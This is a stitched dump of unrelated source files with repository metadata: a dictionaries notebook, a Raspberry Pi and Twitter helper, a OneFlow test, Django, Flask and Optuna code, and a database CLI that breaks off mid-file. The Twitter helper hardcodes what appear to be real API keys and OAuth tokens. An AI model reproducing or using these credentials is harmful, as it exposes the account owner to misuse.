"value:\n",
"24\n",
"\n",
"key:\n",
"Tom\n",
"value:\n",
"32\n",
"\n",
"key:\n",
"Jenny\n",
"value:\n",
"20\n",
"\n",
"key:\n",
"10\n",
"value:\n",
"100\n",
"\n"
]
}
],
"source": [
" for key, value in d.items():\n",
" print(\"key:\")\n",
" print(key)\n",
" print(\"value:\")\n",
" print(value)\n",
" print(\"\")"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.7.6"
}
},
"nbformat": 4,
"nbformat_minor": 4
}
| 18.88 | 354 | 0.439266 |
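The notebook above (stored with a .py extension) walks through dictionary basics cell by cell; condensed into a plain script it reads:

d = {}
d["George"] = 24
d["Tom"] = 32
d["Jenny"] = 16           # insert
d["Jenny"] = 20           # assigning to an existing key overwrites it
d[10] = 100               # keys can be strings or numbers
print(d["Tom"])           # 32
print(d["Jenny"])         # 20; d[Jenny] without quotes raises NameError, as cell 5 shows
for key, value in d.items():
    print("key:", key, "value:", value)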
4367a493fbe503c8a8ff6c69a39f88b75c5407aa
| 125 |
py
|
Python
|
kts/core/types.py
|
konodyuk/kts
|
3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7
|
[
"MIT"
] | 18 |
2019-02-14T13:10:07.000Z
|
2021-11-26T07:10:13.000Z
|
kts/core/types.py
|
konodyuk/kts
|
3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7
|
[
"MIT"
] | 2 |
2019-02-17T14:06:42.000Z
|
2019-09-15T18:05:54.000Z
|
kts/core/types.py
|
konodyuk/kts
|
3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7
|
[
"MIT"
] | 2 |
2019-09-15T13:12:42.000Z
|
2020-04-15T14:05:54.000Z
|
from typing import Union
import pandas as pd
from kts.core.frame import KTSFrame
AnyFrame = Union[pd.DataFrame, KTSFrame]
| 15.625 | 40 | 0.792 |
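A hypothetical usage sketch for the AnyFrame alias above (the function name is illustrative and assumes KTSFrame exposes the pandas DataFrame API):

import pandas as pd
from kts.core.types import AnyFrame

def head_rows(frame: AnyFrame, n: int = 5) -> pd.DataFrame:
    # Accepts either member of the Union; both support .head().
    return frame.head(n)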
717864c0c5586a731d9e7b34b779d6af81159c7a
| 4,509 |
py
|
Python
|
slcyGeneral.py
|
mirrorcoloured/slcypi
|
c47975b3523f770d12a521c82e2dfca181e3f35b
|
[
"MIT"
] | null | null | null |
slcyGeneral.py
|
mirrorcoloured/slcypi
|
c47975b3523f770d12a521c82e2dfca181e3f35b
|
[
"MIT"
] | null | null | null |
slcyGeneral.py
|
mirrorcoloured/slcypi
|
c47975b3523f770d12a521c82e2dfca181e3f35b
|
[
"MIT"
] | null | null | null |
# Python 2.7.1
import RPi.GPIO as GPIO
from twython import Twython
import time
import sys
import os
import pygame
APP_KEY='zmmlyAJzMDIntLpDYmSH98gbw'
APP_SECRET='ksfSVa2hxvTQKYy4UR9tjpb57CAynMJDsygz9qOyzlH24NVwpW'
OAUTH_TOKEN='794094183841566720-BagrHW91yH8C3Mdh9SOlBfpL6wrSVRW'
OAUTH_TOKEN_SECRET='d0Uucq2dkSHrFHZGLM1X8Hw05d80ajKYGl1zTRxZQSKTm'
applepislcy = Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
### GENERAL ###
def Cleanup():
GPIO.cleanup()
def Sleep(seconds):
"""Puts the program to sleep"""
time.sleep(seconds)
def Alert(channel):
"""Simple alert function for testing event interrupts"""
print('Alert on channel',channel)
def TimeString():
"""Returns the current time"""
    t = time.localtime()
    return '.'.join(str(part) for part in t[:6])
def LoadPins(mapping,inp):
"""Organizes an input into a pin mapping dict
mapping <list>, ['IA','IB']
inp <dict>, <list>, <int> {'IA':1,'IB':2}, [1,2]
"""
if type(inp) is int and len(mapping) == 1:
return {mapping[0]:inp}
elif type(inp) is list and len(mapping) == len(inp):
o = {}
for i in range(len(inp)):
o[mapping[i]] = inp[i]
return o
elif type(inp) is dict:
return inp
else:
print('Invalid input for pins:',inp,type(inp))
print('Expected:',mapping)
return {}
def BoolToSign(inp):
"""Converts boolean bits into signed bits
0 -> -1
1 -> 1"""
return (inp * 2) - 1
def SignToBool(inp):
"""Converts signed bits into boolean bits
-1 -> 0
1 -> 1"""
return (inp + 1) / 2
### PYGAME ###
def WindowSetup(size=(300,50),caption='',text='',background=(0,0,0),foreground=(255,255,255)):
"""Sets up a pygame window to take keyboard input
size <tuple>, width by height
caption <str>, window title bar
text <str>, text to display in window, accepts \n
background <tuple>, foreground <tuple>, (r,g,b) color
"""
pygame.init()
screen = pygame.display.set_mode(size,0,32)
pygame.display.set_caption(caption)
myfont = pygame.font.SysFont('Monospace',15)
labels = []
lines = text.split('\n')
for line in lines:
labels.append(myfont.render(line,1,foreground))
screen.fill(background)
y = 0
for label in labels:
screen.blit(label, (0,y))
y += 15
pygame.display.update()
def InputLoop(eventmap):
"""Begins a pygame loop, mapping key inputs to functions
eventmap <dict>, {pygame.K_t:myfunction}
"""
index = 0
while True:
events = pygame.event.get()
for event in events:
if event.type == pygame.KEYDOWN:
#print("{0}: You pressed {1:c}".format ( index , event.key ))
if event.key in eventmap:
eventmap[event.key]()
elif event.type == pygame.QUIT:
pygame.quit()
sys.exit()
def InputLoopDemo():
def dog():
print('woof')
def cat():
print('meow')
def fish():
print('blub')
WindowSetup(caption='pet simulator',text='d for dog\nc for cat\nf for fish')
InputLoop({pygame.K_d:dog, pygame.K_c:cat, pygame.K_f:fish})
### TWITTER ###
def Tweet(twit,statustext):
"""Tweets a message
twit <Twython>, create with Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
statustext <str>, must be <= 140 characters
"""
if len(statustext) > 140:
print('ERROR: Character limit 140 exceeded:',len(statustext))
else:
twit.update_status(status=statustext)
def TweetPicture(twit,file,statustext):
"""Tweets a message with a picture
twit <Twython>, create with Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
file <str>, path and filename to picture
statustext <str>, must be <= 140 characters
"""
    photo = open(file, 'rb')
    response = twit.upload_media(media=photo)  # fixed: 'twitter' was an undefined name; use the client passed in
    twit.update_status(status=statustext, media_ids=[response['media_id']])
def TweetVideo(twit,file,statustext):
"""Tweets a message with a video
twit <Twython>, create with Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
file <str>, path and filename to video
statustext <str>, must be <= 140 characters
"""
    video = open(file, 'rb')
    response = twit.upload_video(media=video, media_type='video/mp4')  # fixed: 'twitter' was an undefined name; use the client passed in
    twit.update_status(status=statustext, media_ids=[response['media_id']])
| 30.883562 | 94 | 0.635174 |
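A quick check of LoadPins against its docstring, run in the same module as the helpers above (values are illustrative):

print(LoadPins(['IA', 'IB'], [1, 2]))              # {'IA': 1, 'IB': 2}
print(LoadPins(['IA'], 7))                         # {'IA': 7}
print(LoadPins(['IA', 'IB'], {'IA': 1, 'IB': 2}))  # dicts pass through unchanged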
71ad91d94d2021895fed2197ad1e1027179c068d
| 5,844 |
py
|
Python
|
oneflow/python/test/ops/test_object_bbox_scale.py
|
caishenghang/oneflow
|
db239cc9f98e551823bf6ce2d4395bd5c339b1c5
|
[
"Apache-2.0"
] | 2 |
2021-09-10T00:19:49.000Z
|
2021-11-16T11:27:20.000Z
|
oneflow/python/test/ops/test_object_bbox_scale.py
|
duijiudanggecl/oneflow
|
d2096ae14cf847509394a3b717021e2bd1d72f62
|
[
"Apache-2.0"
] | null | null | null |
oneflow/python/test/ops/test_object_bbox_scale.py
|
duijiudanggecl/oneflow
|
d2096ae14cf847509394a3b717021e2bd1d72f62
|
[
"Apache-2.0"
] | 1 |
2021-11-10T07:57:01.000Z
|
2021-11-10T07:57:01.000Z
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import os
import random
import cv2
import numpy as np
import oneflow as flow
import oneflow.typing as oft
def _random_sample_images(anno_file, image_dir, batch_size):
from pycocotools.coco import COCO
image_files = []
image_ids = []
batch_group_id = -1
coco = COCO(anno_file)
img_ids = coco.getImgIds()
while len(image_files) < batch_size:
rand_img_id = random.choice(img_ids)
img_h = coco.imgs[rand_img_id]["height"]
img_w = coco.imgs[rand_img_id]["width"]
group_id = int(img_h / img_w)
if batch_group_id == -1:
batch_group_id = group_id
if group_id != batch_group_id:
continue
anno_ids = coco.getAnnIds(imgIds=[rand_img_id])
if len(anno_ids) == 0:
continue
image_files.append(os.path.join(image_dir, coco.imgs[rand_img_id]["file_name"]))
image_ids.append(rand_img_id)
assert len(image_files) == len(image_ids)
images = [cv2.imread(image_file).astype(np.single) for image_file in image_files]
bbox_list = _get_images_bbox_list(coco, image_ids)
return images, bbox_list
def _get_images_bbox_list(coco, image_ids):
bbox_list = []
for img_id in image_ids:
anno_ids = coco.getAnnIds(imgIds=[img_id])
anno_ids = list(
filter(lambda anno_id: coco.anns[anno_id]["iscrowd"] == 0, anno_ids)
)
bbox_array = np.array(
[coco.anns[anno_id]["bbox"] for anno_id in anno_ids], dtype=np.single
)
bbox_list.append(bbox_array)
return bbox_list
def _get_images_static_shape(images):
image_shapes = [image.shape for image in images]
image_static_shape = np.amax(image_shapes, axis=0)
assert isinstance(
image_static_shape, np.ndarray
), "image_shapes: {}, image_static_shape: {}".format(
str(image_shapes), str(image_static_shape)
)
image_static_shape = image_static_shape.tolist()
image_static_shape.insert(0, len(image_shapes))
return image_static_shape
def _get_bbox_static_shape(bbox_list):
bbox_shapes = [bbox.shape for bbox in bbox_list]
bbox_static_shape = np.amax(bbox_shapes, axis=0)
assert isinstance(
bbox_static_shape, np.ndarray
), "bbox_shapes: {}, bbox_static_shape: {}".format(
str(bbox_shapes), str(bbox_static_shape)
)
bbox_static_shape = bbox_static_shape.tolist()
bbox_static_shape.insert(0, len(bbox_list))
return bbox_static_shape
def _of_target_resize_bbox_scale(images, bbox_list, target_size, max_size):
image_shape = _get_images_static_shape(images)
bbox_shape = _get_bbox_static_shape(bbox_list)
flow.clear_default_session()
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float)
func_config.default_logical_view(flow.scope.mirrored_view())
@flow.global_function(function_config=func_config)
def target_resize_bbox_scale_job(
image_def: oft.ListListNumpy.Placeholder(
shape=tuple(image_shape), dtype=flow.float
),
bbox_def: oft.ListListNumpy.Placeholder(
shape=tuple(bbox_shape), dtype=flow.float
),
):
images_buffer = flow.tensor_list_to_tensor_buffer(image_def)
resized_images_buffer, new_size, scale = flow.image_target_resize(
images_buffer, target_size=target_size, max_size=max_size
)
bbox_buffer = flow.tensor_list_to_tensor_buffer(bbox_def)
scaled_bbox = flow.object_bbox_scale(bbox_buffer, scale)
scaled_bbox_list = flow.tensor_buffer_to_tensor_list(
scaled_bbox, shape=bbox_shape[1:], dtype=flow.float
)
return scaled_bbox_list, new_size
input_image_list = [np.expand_dims(image, axis=0) for image in images]
input_bbox_list = [np.expand_dims(bbox, axis=0) for bbox in bbox_list]
output_bbox_list, output_image_size = target_resize_bbox_scale_job(
[input_image_list], [input_bbox_list]
).get()
return output_bbox_list.numpy_lists()[0], output_image_size.numpy_list()[0]
def _compare_bbox_scale(
test_case,
anno_file,
image_dir,
batch_size,
target_size,
max_size,
print_debug_info=False,
):
images, bbox_list = _random_sample_images(anno_file, image_dir, batch_size)
of_bbox_list, image_size_list = _of_target_resize_bbox_scale(
images, bbox_list, target_size, max_size
)
for image, bbox, of_bbox, image_size in zip(
images, bbox_list, of_bbox_list, image_size_list
):
w, h = image_size
oh, ow = image.shape[0:2]
scale_h = h / oh
scale_w = w / ow
bbox[:, 0] *= scale_w
bbox[:, 1] *= scale_h
bbox[:, 2] *= scale_w
bbox[:, 3] *= scale_h
test_case.assertTrue(np.allclose(bbox, of_bbox))
@flow.unittest.skip_unless_1n1d()
class TestObjectBboxScale(flow.unittest.TestCase):
def test_object_bbox_scale(test_case):
_compare_bbox_scale(
test_case,
"/dataset/mscoco_2017/annotations/instances_val2017.json",
"/dataset/mscoco_2017/val2017",
4,
800,
1333,
)
if __name__ == "__main__":
unittest.main()
| 32.287293 | 88 | 0.688912 |
1ce550dcd34ad1e54a6bb3af57029219d257f4d1
| 742 |
py
|
Python
|
source/blog/migrations/0004_postcomments.py
|
JakubGutowski/PersonalBlog
|
96122b36486f7e874c013e50d939732a43db309f
|
[
"BSD-3-Clause"
] | null | null | null |
source/blog/migrations/0004_postcomments.py
|
JakubGutowski/PersonalBlog
|
96122b36486f7e874c013e50d939732a43db309f
|
[
"BSD-3-Clause"
] | null | null | null |
source/blog/migrations/0004_postcomments.py
|
JakubGutowski/PersonalBlog
|
96122b36486f7e874c013e50d939732a43db309f
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 2.0.5 on 2018-07-02 19:46
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('blog', '0003_blogpost_author'),
]
operations = [
migrations.CreateModel(
name='PostComments',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nick', models.CharField(max_length=20)),
('comment', models.CharField(max_length=140)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.BlogPost')),
],
),
]
| 30.916667 | 115 | 0.58221 |
1cecb4c2f3b6f24c919644faa0e058b12f679c06
| 273 |
py
|
Python
|
src/flocker/blueprints/red/__init__.py
|
Muxelmann/home-projects
|
85bd06873174b9c5c6276160988c19b460370db8
|
[
"MIT"
] | null | null | null |
src/flocker/blueprints/red/__init__.py
|
Muxelmann/home-projects
|
85bd06873174b9c5c6276160988c19b460370db8
|
[
"MIT"
] | null | null | null |
src/flocker/blueprints/red/__init__.py
|
Muxelmann/home-projects
|
85bd06873174b9c5c6276160988c19b460370db8
|
[
"MIT"
] | null | null | null |
import os
from flask import Blueprint, render_template
def create_bp():
bp_red = Blueprint('red', __name__, url_prefix='/red')
@bp_red.route('/index/')
@bp_red.route('/')
def index():
return render_template('red/index.html')
return bp_red
| 22.75 | 58 | 0.652015 |
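A hedged sketch of wiring the factory above into an application; the import path is an assumption based on the repo layout shown:

from flask import Flask
from flocker.blueprints.red import create_bp

app = Flask(__name__)
app.register_blueprint(create_bp())  # index served under /red/ and /red/index/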
1c073d575249e6f524c3e4fa1ac84edb0ff05cc7
| 984 |
py
|
Python
|
UAS/UAS 11 & 12/main.py
|
Archedar/UAS
|
3237d9304026340acc93c8f36b358578dc0ae66f
|
[
"BSD-Source-Code"
] | null | null | null |
UAS/UAS 11 & 12/main.py
|
Archedar/UAS
|
3237d9304026340acc93c8f36b358578dc0ae66f
|
[
"BSD-Source-Code"
] | null | null | null |
UAS/UAS 11 & 12/main.py
|
Archedar/UAS
|
3237d9304026340acc93c8f36b358578dc0ae66f
|
[
"BSD-Source-Code"
] | null | null | null |
#Main Program
from Class import Barang
import Menu
histori = list()
listBarang = [
Barang('Rinso', 5000, 20),
Barang('Sabun', 3000, 20),
Barang('Pulpen', 2500, 20),
Barang('Tisu', 10000, 20),
Barang('Penggaris', 1000, 20)
]
while True:
print('''
Menu
1. Tampilkan Barang
2. Tambahkan Barang
3. Tambah Stock Barang
4. Hapus Barang
5. Cari Barang Berdasarkan Keyword
6. Hitung Barang Belanjaan
7. Histori Keluar Masuk Barang
0. Keluar Program
''')
choice = input('Masukan No Menu: ')
if choice == '1':
Menu.menu1(listBarang)
elif choice == '2':
Menu.menu2(listBarang, histori)
elif choice == '3':
Menu.menu3(listBarang, histori)
elif choice == '4':
Menu.menu4(listBarang, histori)
elif choice == '5':
Menu.menu5(listBarang)
elif choice == '6':
Menu.menu6(listBarang, histori)
elif choice == '7':
Menu.menu7(histori)
elif choice == '0':
print('Keluar Program')
break
else:
print('Invalid Input!')
| 20.93617 | 37 | 0.645325 |
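An optional refactor sketch: the if/elif chain above expressed as a dispatch table (Menu, listBarang, and histori come from the program above; only the dispatch is shown, not the menu banner):

handlers = {
    '1': lambda: Menu.menu1(listBarang),
    '2': lambda: Menu.menu2(listBarang, histori),
    '3': lambda: Menu.menu3(listBarang, histori),
    '4': lambda: Menu.menu4(listBarang, histori),
    '5': lambda: Menu.menu5(listBarang),
    '6': lambda: Menu.menu6(listBarang, histori),
    '7': lambda: Menu.menu7(histori),
}
while True:
    choice = input('Masukan No Menu: ')
    if choice == '0':
        print('Keluar Program')
        break
    handlers.get(choice, lambda: print('Invalid Input!'))()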
98d7520f9994f6836e73faaf42f63009eee0dc64
| 697 |
py
|
Python
|
project/cli/event.py
|
DanielGrams/gsevp
|
e94034f7b64de76f38754b56455e83092378261f
|
[
"MIT"
] | 1 |
2021-06-01T14:49:18.000Z
|
2021-06-01T14:49:18.000Z
|
project/cli/event.py
|
DanielGrams/gsevp
|
e94034f7b64de76f38754b56455e83092378261f
|
[
"MIT"
] | 286 |
2020-12-04T14:13:00.000Z
|
2022-03-09T19:05:16.000Z
|
project/cli/event.py
|
DanielGrams/gsevpt
|
a92f71694388e227e65ed1b24446246ee688d00e
|
[
"MIT"
] | null | null | null |
import click
from flask.cli import AppGroup
from project import app, db
from project.dateutils import berlin_tz
from project.services.event import (
get_recurring_events,
update_event_dates_with_recurrence_rule,
)
event_cli = AppGroup("event")
@event_cli.command("update-recurring-dates")
def update_recurring_dates():
# Setting the timezone is neccessary for cli command
db.session.execute("SET timezone TO :val;", {"val": berlin_tz.zone})
events = get_recurring_events()
for event in events:
update_event_dates_with_recurrence_rule(event)
db.session.commit()
click.echo(f"{len(events)} event(s) were updated.")
app.cli.add_command(event_cli)
| 24.034483 | 72 | 0.746055 |
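A hedged sketch of exercising the command above from a test, using Flask's built-in CLI test runner (assumes a configured database, since the command touches the session):

from project import app

runner = app.test_cli_runner()
result = runner.invoke(args=["event", "update-recurring-dates"])
print(result.output)  # e.g. "3 event(s) were updated."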
908cafca02ccd9dbc79045504cbba8cbd1494065
| 12,221 |
py
|
Python
|
src/onegov/translator_directory/layout.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/translator_directory/layout.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/translator_directory/layout.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from cached_property import cached_property
from purl import URL
from onegov.translator_directory import _
from onegov.core.elements import Block, Link, LinkGroup, Confirm, Intercooler
from onegov.core.utils import linkify
from onegov.org.layout import DefaultLayout as BaseLayout
from onegov.translator_directory.collections.documents import \
TranslatorDocumentCollection
from onegov.translator_directory.collections.language import LanguageCollection
from onegov.translator_directory.collections.translator import \
TranslatorCollection
from onegov.translator_directory.constants import member_can_see, \
editor_can_see, GENDERS, ADMISSIONS, PROFESSIONAL_GUILDS, \
INTERPRETING_TYPES
class DefaultLayout(BaseLayout):
@staticmethod
def linkify(text):
return linkify(text)
@staticmethod
def format_languages(languages):
return ', '.join(sorted((lang.name for lang in languages or [])))
def format_gender(self, gender):
return self.request.translate(GENDERS[gender])
@staticmethod
def format_drive_distance(number):
if not number:
return ''
return f'{number} km'
def format_boolean(self, val):
assert isinstance(val, bool)
return self.request.translate((_('Yes') if val else _('No')))
def format_admission(self, val):
return self.request.translate(ADMISSIONS[val])
def show(self, attribute_name):
"""Some attributes on the translator are hidden for less privileged
users"""
if self.request.is_member:
return attribute_name in member_can_see
if self.request.is_editor:
return attribute_name in editor_can_see
return True
def color_class(self, count):
""" Depending how rare a language is offered by translators,
apply a color code using the returned css class
"""
if count <= 5:
return 'text-orange'
def format_prof_guild(self, key):
return self.request.translate(PROFESSIONAL_GUILDS[key])
def format_interpreting_type(self, key):
return self.request.translate(INTERPRETING_TYPES[key])
class TranslatorLayout(DefaultLayout):
@cached_property
def file_collection(self):
return TranslatorDocumentCollection(
self.request.session,
translator_id=self.model.id,
category=None
)
@cached_property
def editbar_links(self):
if self.request.is_admin:
return [
LinkGroup(
title=_('Add'),
links=(
Link(
text=_("Add translator"),
url=self.request.class_link(
TranslatorCollection, name='new'
),
attrs={'class': 'new-person'}
),
)
),
Link(
text=_("Edit"),
url=self.request.link(
self.model, name='edit'
),
attrs={'class': 'edit-link'}
),
Link(
_('Delete'),
self.csrf_protected_url(
self.request.link(self.model)
),
attrs={'class': 'delete-link'},
traits=(
Confirm(
_("Do you really want to delete "
"this translator?"),
_("This cannot be undone."),
_("Delete translator"),
_("Cancel")
),
Intercooler(
request_method='DELETE',
redirect_after=self.request.class_link(
TranslatorCollection
)
)
)
),
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
),
Link(
_('Documents'),
self.request.link(self.file_collection),
attrs={'class': 'documents'}
),
]
elif self.request.is_editor:
return [
Link(
text=_("Edit"),
url=self.request.link(
self.model, name='edit-restricted'
),
attrs={'class': 'edit-link'}
),
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
),
]
elif self.request.is_member:
return [
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
)
]
@cached_property
def breadcrumbs(self):
links = super().breadcrumbs + [
Link(
text=_('Translators'),
url=self.request.class_link(TranslatorCollection)
),
Link(text=self.model.title)
]
return links
class EditTranslatorLayout(TranslatorLayout):
@cached_property
def title(self):
return _('Edit translator')
@cached_property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(_('Edit')))
return links
class TranslatorCollectionLayout(DefaultLayout):
@cached_property
def title(self):
return _('Search for translators')
@cached_property
def breadcrumbs(self):
return super().breadcrumbs + [
Link(
text=_('Translators'),
url=self.request.class_link(TranslatorCollection)
)
]
@cached_property
def editbar_links(self):
if self.request.is_admin:
return [
LinkGroup(
_('Add'),
links=(
Link(
text=_("Add translator"),
url=self.request.class_link(
TranslatorCollection, name='new'
),
attrs={'class': 'new-person'}
),
Link(
text=_("Add language"),
url=self.request.class_link(
LanguageCollection, name='new'
),
attrs={'class': 'new-language'}
)
)
),
Link(
_('Export Excel'),
url=self.request.class_link(
TranslatorCollection, name='export'
),
attrs={'class': 'export-link'}
),
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
)
]
elif self.request.is_editor or self.request.is_member:
return [
Link(
_('Voucher template'),
self.request.link(self.request.app.org, name='voucher'),
attrs={'class': 'create-excel'}
)
]
class AddTranslatorLayout(TranslatorCollectionLayout):
@cached_property
def title(self):
return _('Add translator')
@cached_property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(_('Add')))
return links
@property
def editbar_links(self):
return []
class TranslatorDocumentsLayout(DefaultLayout):
@cached_property
def breadcrumbs(self):
return super().breadcrumbs + [
Link(
text=_('Translators'),
url=self.request.class_link(TranslatorCollection)
),
Link(
text=self.model.translator.title,
url=self.request.link(self.model.translator)
),
Link(text=_('Documents'))
]
@cached_property
def upload_url(self):
url = URL(self.request.link(self.model, name='upload'))
url = url.query_param('category', self.model.category)
return self.csrf_protected_url(url.as_string())
def link_for(self, category):
return self.request.class_link(
self.model.__class__,
{'translator_id': self.model.translator_id, 'category': category}
)
class LanguageCollectionLayout(DefaultLayout):
@property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(_('Languages')))
return links
@property
def editbar_links(self):
return [LinkGroup(
_('Add'),
links=(
Link(
text=_("Add language"),
url=self.request.class_link(
LanguageCollection, name='new'
),
attrs={'class': 'new-language'}
),
)
)] if self.request.is_admin else []
class LanguageLayout(DefaultLayout):
@property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(
Link(_('Languages'),
url=self.request.class_link(LanguageCollection))
)
return links
class EditLanguageLayout(LanguageLayout):
@property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(self.model.name))
links.append(Link(_('Edit')))
return links
@cached_property
def editbar_links(self):
if self.request.is_admin:
if not self.model.deletable:
return [
Link(
_('Delete'),
self.csrf_protected_url(
self.request.link(self.model)
),
attrs={'class': 'delete-link'},
traits=(
Block(
_("This language is used and can't be "
"deleted."),
no=_("Cancel")
),
)
),
]
return [
Link(
_('Delete'),
self.csrf_protected_url(
self.request.link(self.model)
),
attrs={'class': 'delete-link'},
traits=(
Confirm(
_("Do you really want to delete "
"this language?"),
_("This cannot be undone."),
_("Delete language"),
_("Cancel")
),
Intercooler(
request_method='DELETE',
redirect_after=self.request.class_link(
TranslatorCollection
)
)
)
),
]
return []
class AddLanguageLayout(LanguageLayout):
@property
def breadcrumbs(self):
links = super().breadcrumbs
links.append(Link(_('Add')))
return links
@property
def editbar_links(self):
return []
| 31.17602 | 79 | 0.469274 |
90b9ca60618e207e4f11df9555b71806b45d69af
| 1,538 |
py
|
Python
|
src/classifier/classifier_tuning/tune_sklearn.py
|
krangelie/bias-in-german-nlg
|
9fbaf50fde7d41d64692ae90c41beae61bc78d44
|
[
"MIT"
] | 14 |
2021-08-24T12:36:37.000Z
|
2022-03-18T12:14:36.000Z
|
src/classifier/classifier_tuning/tune_sklearn.py
|
krangelie/bias-in-german-nlg
|
9fbaf50fde7d41d64692ae90c41beae61bc78d44
|
[
"MIT"
] | null | null | null |
src/classifier/classifier_tuning/tune_sklearn.py
|
krangelie/bias-in-german-nlg
|
9fbaf50fde7d41d64692ae90c41beae61bc78d44
|
[
"MIT"
] | 1 |
2021-10-21T20:22:55.000Z
|
2021-10-21T20:22:55.000Z
|
from sklearn.ensemble import RandomForestClassifier
import xgboost
def suggest_xgb(model_params, trial):
n_estimators = trial.suggest_int(
model_params.n_estimators.name,
model_params.n_estimators.lower,
model_params.n_estimators.upper,
model_params.n_estimators.step,
)
lr = trial.suggest_float(
model_params.learning_rate.name,
model_params.learning_rate.lower,
model_params.learning_rate.upper,
log=True,
)
max_depth = trial.suggest_int(
model_params.max_depth.name,
model_params.max_depth.lower,
model_params.max_depth.upper,
model_params.max_depth.step,
)
classifier = xgboost.XGBClassifier(
n_estimators=n_estimators,
learning_rate=lr,
max_depth=max_depth,
random_state=42,
use_label_encoder=False,
tree_method="gpu_hist",
gpu_id=0,
)
return classifier
def suggest_rf(model_params, trial):
n_estimators = trial.suggest_int(
model_params.n_estimators.name,
model_params.n_estimators.lower,
model_params.n_estimators.upper,
model_params.n_estimators.step,
)
max_depth = trial.suggest_int(
model_params.max_depth.name,
model_params.max_depth.lower,
model_params.max_depth.upper,
model_params.max_depth.step,
)
classifier = RandomForestClassifier(
n_estimators=n_estimators, max_depth=max_depth, random_state=42
)
return classifier
| 27.963636 | 71 | 0.683355 |
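A hedged sketch of plugging suggest_rf into an Optuna study; model_params, X, and y are assumptions standing in for the project's config object and training data:

import optuna
from sklearn.model_selection import cross_val_score

def objective(trial):
    clf = suggest_rf(model_params, trial)  # hyperparameters drawn per trial
    return cross_val_score(clf, X, y, cv=3, scoring="f1_macro").mean()

study = optuna.create_study(direction="maximize")
study.optimize(objective, n_trials=20)
print(study.best_params)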
292abc115693fa0811cb421e9f5c9743d0e6e3a6
| 7,521 |
py
|
Python
|
year_3/databases_sem1/lab1/cli.py
|
honchardev/KPI
|
f8425681857c02a67127ffb05c0af0563a8473e1
|
[
"MIT"
] | null | null | null |
year_3/databases_sem1/lab1/cli.py
|
honchardev/KPI
|
f8425681857c02a67127ffb05c0af0563a8473e1
|
[
"MIT"
] | 21 |
2020-03-24T16:26:04.000Z
|
2022-02-18T15:56:16.000Z
|
year_3/databases_sem1/lab1/cli.py
|
honchardev/KPI
|
f8425681857c02a67127ffb05c0af0563a8473e1
|
[
"MIT"
] | null | null | null |
from maxdb import DB
def runtime_on_any_exception(func):
    def decorate(*args, **kwargs):
        try:
            func(*args, **kwargs)
        except Exception as exc:
            # chain the original exception so the root cause stays visible
            raise RuntimeError from exc
    return decorate
class CLIUtils(object):
DEFAULT_PATH = 'storage.json'
def __init__(self):
self._db = None
self._path = self.DEFAULT_PATH
def run(self, rawcmd):
cmd, *args = rawcmd.split(' ')
if cmd:
try:
self._cmds_cache[cmd](args)
except KeyError:
print('Lab1 does not have command <{0}>'.format(cmd))
except RuntimeError:
print('Incorrect arguments for DB.{0}: <{1}>'.format(cmd, args))
@property
def _cmds_cache(self):
return {
'tables': self._tables,
'all': self._all,
'insert': self._insert,
'get': self._get,
'update': self._update,
'delete': self._delete,
'help': lambda _: print(self._help_msg),
'path': lambda _: print(self._path),
'exit': self._close,
}
@property
def _help_msg(self):
return """LAB1 HELP:
| tables
| print list of tables from current storage.
| all <table> (<table> ...)
| display _all values from specific table.
| all labcondition
| display _all products with price more than 100UAH.
| insert <table> <cnt>
| insert N items to the table.
| is followed by >>>column_name <value>
| get <table> <id>
| get single row specified by id from table.
| update <table> <id>
| udpate table with a new single value.
| is followed by
| >>>with <column> <value> (<column> <value> (...))
| delete <table> <id>
| delete row specified by id from table.
| save <filepath>
| save database using current storage type to specified filepath.
| load <filepath>
| load specific database from file using current storage type.
| help
| display current message.
| path
| display storage file path.
| exit
| exit the program.
"""
def _tables(self, _):
print(self._db.tables())
